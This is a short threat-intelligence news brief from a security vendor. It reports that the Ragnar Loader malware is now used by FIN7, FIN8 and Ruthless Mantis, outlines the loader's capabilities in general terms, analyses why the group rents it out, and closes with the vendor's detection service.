Security Intelligence
Loading table of contents...
Researchers have recently revealed that Ragnar Loader, a tool mainly associated with Ragnar Locker, is now being used by other sophisticated threat actors including FIN7, FIN8, and Ruthless Mantis.
Ragnar Loader is a tool, first discovered in 2021, that is primarily used to establish long-term stealthy access to targeted networks with clever features like encryption, process injection, token manipulation, PowerShell-based payload execution, and anti-analysis techniques.
Stay on top of emerging threats.
Sign up to receive a weekly roundup of our security intelligence feed. You'll be the first to know of emerging attack vectors, threats, and vulnerabilities.
The tool can conduct various backdoor operations by running DLL plugins and shellcode, as well as reading and exfiltrating files. It can leverage a PowerShell-based pivoting file to enable lateral movement within a network and can even serve as a command and control (C2) panel that allows the threat actor to remotely control the compromised target.
While it’s unclear why Ragnar Locker appears to be renting or loaning out its tool to other criminal hacking groups, researchers have observed frequent updates to the tool to include new features and modules making it more capable and more difficult to detect.
Source: The Hacker News
Analysis
Beyond generating revenue, Ragnar Locker may loan or rent out its malware toolkit to help obfuscate attribution, making it harder for security researchers to link specific attacks to the group. If multiple actors use the same tool, it creates plausible deniability, complicating efforts to track down the original developers.
By renting out the Ragnar Loader, Ragnar Locker can strengthen alliances with other cybercriminal syndicates, such as FIN7 and FIN8, fostering collaboration where different groups contribute expertise—one specializing in network breaches, another in ransomware deployment. This increases the effectiveness of attacks while allowing Ragnar Locker to study how affiliates operate, gather intelligence on new attack methods, and refine its own tactics.
Additionally, the revenue generated from these rentals can be reinvested into research and development, ensuring the malware remains sophisticated and resilient against evolving security defenses.
Ultimately, renting out Ragnar Loader allows Ragnar Locker to scale its operations, diversify its income, and reduce risk while maintaining influence within the broader cybercrime ecosystem. This strategy enables the group to maximize impact while staying in the shadows, making detection and disruption more challenging for cybersecurity professionals and law enforcement agencies.
Mitigation
Field Effect’s Security Intelligence team constantly monitor the cyber threat landscape for threats related to loaders and other potentially malicious tools. This research contributes to the timely deployment of signatures into Field Effect MDR to detect and mitigate these threats.
Field Effect MDR users are automatically notified when threat-related activity is detected in their environment and are encouraged to review these AROs as quickly as possible via the Field Effect portal.
